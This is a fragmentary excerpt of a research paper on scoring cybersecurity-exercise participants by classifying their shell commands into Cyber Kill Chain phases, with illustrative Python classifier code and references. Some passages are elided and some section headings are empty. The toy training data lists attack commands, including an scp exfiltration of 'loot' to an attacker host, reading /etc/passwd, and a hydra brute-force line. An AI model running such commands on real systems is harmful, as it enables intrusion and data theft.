3. PROPOSED ASSESSMENT SYSTEM

In cybersecurity exercises, it is crucial to measure the skill set of individuals in order to assess their capabilities and identify areas for improvement. One way to measure an individual's skill set is to examine each phase of the attack they perform during the exercise. As mentioned earlier, the Cyber Kill Chain is a framework that breaks down a cyber attack into seven phases, each involving different sets of commands from the attacker's perspective. To measure an individual's skill set, we propose a system that fetches the attacker's command-line history from a system and uses machine learning classification algorithms to classify the attacker's use of commands in solving particular challenges. By classifying an individual's use of commands during each phase of the Cyber Kill Chain, we can measure their skill set in cybersecurity exercises and identify areas for improvement. The system works by collecting the command-line history of an attacker during a cybersecurity exercise and then using machine learning algorithms to classify the commands used by the attacker during each phase of the Cyber Kill Chain. Once the commands have been classified, the system can generate a skill assessment for solving the challenge that provides insights into the individual's skill set and areas for improvement.

… data splitting, where the dataset is divided into training and testing sets. The training set is used to train the classification model, while the testing set is used to evaluate the model's performance. The fifth step is model construction, where the selected machine learning algorithms are trained on the training set and optimized using a grid search approach. We employed five baseline machine learning algorithms, namely K-Nearest Neighbors (KNN), Random Forest (RF), Multinomial Naive Bayes (MNB), Logistic Regression (LR), and an Ensemble, for benchmarking in addition to our diffusion model for classification. Finally, the sixth step involves evaluating the performance of the trained model on the testing set. The evaluation metrics used in this study were accuracy, precision, recall, and F1-score. The trained model predicts which of the seven stages (Fig. 5) of the Cyber Kill Chain the command-line data belongs to: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives.

4.1. Data Collection

To identify the skill sets of the participants, more than 40,000 commands were collected from several participants involved in cybersecurity exercises. Of these, approximately ten thousand commands were labelled with the Cyber Kill Chain classes. The dataset was developed by Švábenskỳ et al. in [19].
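The splitting, grid-search, and evaluation steps described above can be sketched with a standard TF-IDF pipeline. This is an illustrative sketch only, not the authors' implementation: the commands, labels, and hyperparameter grid below are hypothetical toy data chosen to make the example self-contained.

```python
# Illustrative sketch (not the authors' code): TF-IDF features plus a
# grid-searched baseline classifier mapping shell commands to Cyber Kill
# Chain phases. All commands and labels here are hypothetical toy data.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_recall_fscore_support
from sklearn.model_selection import GridSearchCV, train_test_split
from sklearn.pipeline import Pipeline

commands = [
    "nmap -sV 10.0.0.5", "whois example.com",            # reconnaissance
    "dig example.com any", "ping -c 4 10.0.0.5",
    "sqlmap -u http://host/?id=1", "searchsploit vsftpd",  # exploitation
    "hydra -l admin -P words.txt ssh://10.0.0.5",
    "msfconsole -x 'use exploit/multi/handler'",
    "cat /etc/passwd", "tar czf loot.tgz /home",         # actions on objectives
    "scp loot.tgz attacker@10.0.0.9:", "history -c",
]
labels = (["reconnaissance"] * 4 + ["exploitation"] * 4
          + ["actions_on_objectives"] * 4)

# Step 4: data splitting into training and testing sets.
X_train, X_test, y_train, y_test = train_test_split(
    commands, labels, test_size=0.25, stratify=labels, random_state=0)

# Step 5: model construction, optimized with a grid search.
pipeline = Pipeline([
    ("tfidf", TfidfVectorizer(analyzer="char_wb", ngram_range=(2, 4))),
    ("clf", LogisticRegression(max_iter=1000)),
])
grid = GridSearchCV(pipeline, {"clf__C": [0.1, 1.0, 10.0]}, cv=3)
grid.fit(X_train, y_train)

# Step 6: evaluation on the held-out testing set.
y_pred = grid.predict(X_test)
prec, rec, f1, _ = precision_recall_fscore_support(
    y_test, y_pred, average="macro", zero_division=0)
print(f"precision={prec:.2f} recall={rec:.2f} f1={f1:.2f}")
```

The same `Pipeline`/`GridSearchCV` skeleton accommodates the other baselines (KNN, RF, MNB, Ensemble) by swapping the `clf` step and its parameter grid.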
Fig. 4. Distributions of classes with respect to the train/test split
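A per-class distribution like the one summarized in Fig. 4 is typically preserved with a stratified split. The following minimal standard-library sketch shows the idea; `stratified_split` and the labelled commands are hypothetical, not the authors' code or data.

```python
# Minimal sketch (assumed helper, not the authors' code): a stratified
# train/test split that keeps each class's share of the data roughly
# equal across the training and testing sets.
import random
from collections import defaultdict

def stratified_split(samples, labels, test_ratio=0.2, seed=42):
    """Return (train, test) lists of (sample, label) pairs, split per class."""
    rng = random.Random(seed)
    by_class = defaultdict(list)
    for pair in zip(samples, labels):
        by_class[pair[1]].append(pair)
    train, test = [], []
    for items in by_class.values():
        rng.shuffle(items)
        k = max(1, round(len(items) * test_ratio))  # at least one test item
        test.extend(items[:k])
        train.extend(items[k:])
    return train, test

# Usage with hypothetical labelled commands (60/40 class imbalance):
cmds = [f"cmd-{i}" for i in range(100)]
phases = ["reconnaissance"] * 60 + ["exploitation"] * 40
train, test = stratified_split(cmds, phases, test_ratio=0.2)
```

Because the split is done class by class, a 60/40 imbalance in the full dataset carries over to both the training and the testing sets.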
5. PROPOSED MODEL
6. CONCLUSION
[1] …, "… systematic literature review," Virtual Reality & Intelligent Hardware, vol. 4, no. 3, pp. 189–209, 2022.

[2] Lucas McDaniel, Erik Talvi, and Brian Hay, "Capture the flag as cyber security introduction," in 2016 49th Hawaii International Conference on System Sciences (HICSS). IEEE, 2016, pp. 5479–5486.

[3] Stela Kucek and Maria Leitner, "An empirical survey of functions and configurations of open-source capture the flag (CTF) environments," Journal of Network and Computer Applications, vol. 151, pp. 102470, 2020.

[4] Erik Moore, Steven Fulton, and Dan Likarish, "Evaluating a multi agency cyber security training program using pre-post event assessment and longitudinal analysis," in Information Security Education for a Global Digital Society: 10th IFIP WG 11.8 World Conference, WISE 10, Rome, Italy, May 29-31, 2017, Proceedings 10. Springer, 2017, pp. 147–156.

[5] Muhammad Mudassar Yamin, Ankur Shukla, Mohib Ullah, and Basel Katt, "Adapt: automated defence training platform in a cyber range," in International Conference on Information Systems and Management Science. Springer, 2022, pp. 184–203.

[6] Muhammad Mudassar Yamin and Basel Katt, "Detecting malicious windows commands using natural language processing techniques," in Innovative Security Solutions for Information Technology and Communications: 11th International Conference, SecITC 2018. Springer, 2019, pp. 157–169.

[7] William Aubrey Labuschagne and Marthie Grobler, "Developing a capability to classify technical skill levels within a cyber range," in ECCWS 2017 16th European Conference on Cyber Warfare and Security. Academic Conferences and Publishing Limited, 2017, p. 224.

[8] Muhammad Mudassar Yamin, Mohib Ullah, Habib Ullah, Basel Katt, Mohammad Hijji, and Khan Muhammad, "Mapping tools for open source intelligence with cyber kill chain for adversarial aware security," Mathematics, vol. 10, no. 12, pp. 2054, 2022.

[9] Muhammad Mudassar Yamin, Mohib Ullah, Habib Ullah, and Basel Katt, "Weaponized AI for cyber attacks," Journal of Information Security and Applications, vol. 57, pp. 102722, 2021.

[10] Muhammad Mudassar Yamin and Basel Katt, "Cyber security skill set analysis for common curricula development," in 14th International Conference on Availability, Reliability and Security, 2019, pp. 1–8.

[11] Tarun Yadav and Arvind Mallari Rao, "Technical aspects of cyber kill chain," in Security in Computing and Communications: Third International Symposium, SSCC 2015, Kochi, India, August 10-13, 2015. Proceedings 3. Springer, 2015, pp. 438–452.

[12] Eric M Hutchins, Michael J Cloppert, Rohan M Amin, et al., "Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains," Leading Issues in Information Warfare & Security Research, vol. 1, no. 1, pp. 80, 2011.

[13] Samaher Al-Janabi and Ibrahim Al-Shourbaji, "A study of cyber security awareness in educational environment in the middle east," Journal of Information & Knowledge Management, vol. 15, no. 01, pp. 1650007, 2016.

[14] Ludwig Slusky and Parviz Partow-Navid, "Students information security practices and awareness," Journal of Information Privacy and Security, vol. 8, no. 4, pp. 3–26, 2012.

[15] Dania Aljeaid, Amal Alzhrani, Mona Alrougi, and Oroob Almalki, "Assessment of end-user susceptibility to cybersecurity threats in Saudi Arabia by simulating phishing attacks," Information, vol. 11, no. 12, pp. 547, 2020.

[16] Muhammad Mudassar Yamin and Basel Katt, "Modeling attack and defense scenarios for cyber security exercises," in 5th Interdisciplinary Cyber Research Conference, 2019, p. 7.

[17] Valdemar Švábenskỳ, Jan Vykopal, Pavel Čeleda, Kristián Tkáčik, and Daniel Popovič, "Student assessment in cybersecurity training automated by pattern mining and clustering," Education and Information Technologies, vol. 27, no. 7, pp. 9231–9262, 2022.

[18] Kaie Maennel, "Learning analytics perspective: Evidencing learning from digital datasets in cybersecurity exercises," in 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). IEEE, 2020, pp. 27–36.

[19] Valdemar Švábenskỳ, Jan Vykopal, Pavel Seda, and Pavel Čeleda, "Dataset of shell commands used by participants of hands-on cybersecurity training," Data in Brief, vol. 38, pp. 107398, 2021.

[20] Richard Weiss, Franklyn Turbak, Jens Mache, and Michael E Locasto, "Cybersecurity education and assessment in EDURange," IEEE Security & Privacy, vol. 15, no. 03, pp. 90–95, 2017.

[21] Jelena Mirkovic, Aashray Aggarwal, David Weinman, Paul Lepe, Jens Mache, and Richard Weiss, "Using terminal histories to monitor student progress on hands-on exercises," in Proceedings of the 51st ACM Technical Symposium on Computer Science Education, 2020, pp. 866–872.

[22] Margus Ernits, Kaie Maennel, Sten Mäses, Toomas Lepik, and Olaf Maennel, "From simple scoring towards a meaningful interpretation of learning in cybersecurity exercises," in ICCWS 2020 15th International Conference on Cyber Warfare and Security. Academic Conferences and Publishing Limited, 2020, p. 135.

[23] Sergio Caltagirone, Andrew Pendergast, and Christopher Betz, "The diamond model of intrusion analysis," Tech. Rep., Center for Cyber Intelligence Analysis and Threat Research, Hanover, MD, 2013.

[24] Blake E Strom, Andy Applebaum, Doug P Miller, Kathryn C Nickels, Adam G Pennington, and Cody B Thomas, "MITRE ATT&CK: Design and philosophy," Technical report, 2018.

[25] Sindhu Abro, Sarang Shaikh, Zahid Hussain Khand, Ali Zafar, Sajid Khan, and Ghulam Mujtaba, "Automatic hate speech detection using machine learning: A comparative study," International Journal of Advanced Computer Science and Applications, vol. 11, no. 8, 2020.

[26] Juan Ramos et al., "Using TF-IDF to determine word relevance in document queries," in Proceedings of the First Instructional Conference on Machine Learning. Citeseer, 2003, vol. 242, pp. 29–48.

[27] Rosie Dunford, Quanrong Su, and Ekraj Tamang, "The Pareto principle," 2014.

[28] Xizewen Han, Huangjie Zheng, and Mingyuan Zhou, "CARD: Classification and regression diffusion models," arXiv preprint arXiv:2206.07275, 2022.

[29] Naeem Seliya, Taghi M Khoshgoftaar, and Jason Van Hulse, "A study on the relationships of classifier performance metrics," in 2009 21st IEEE International Conference on Tools with Artificial Intelligence. IEEE, 2009, pp. 59–66.

[30] L Mary Gladence, M Karthi, and V Maria Anu, "A statistical comparison of logistic regression and different Bayes classification methods for machine learning," ARPN Journal of Engineering and Applied Sciences, vol. 10, no. 14, pp. 5947–5953, 2015.

[31] David D Lewis, "Naive (Bayes) at forty: The independence assumption in information retrieval," in European Conference on Machine Learning. Springer, 1998, pp. 4–15.

[32] Thorsten Joachims, "Text categorization with support vector machines: Learning with many relevant features," in European Conference on Machine Learning. Springer, 1998, pp. 137–142.

[33] Baoxun Xu, Xiufeng Guo, Yunming Ye, and Jiefeng Cheng, "An improved random forest classifier for text categorization," J. Comput., vol. 7, no. 12, pp. 2913–2920, 2012.

[34] Omer Sagi and Lior Rokach, "Ensemble learning: A survey," Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery, vol. 8, no. 4, pp. e1249, 2018.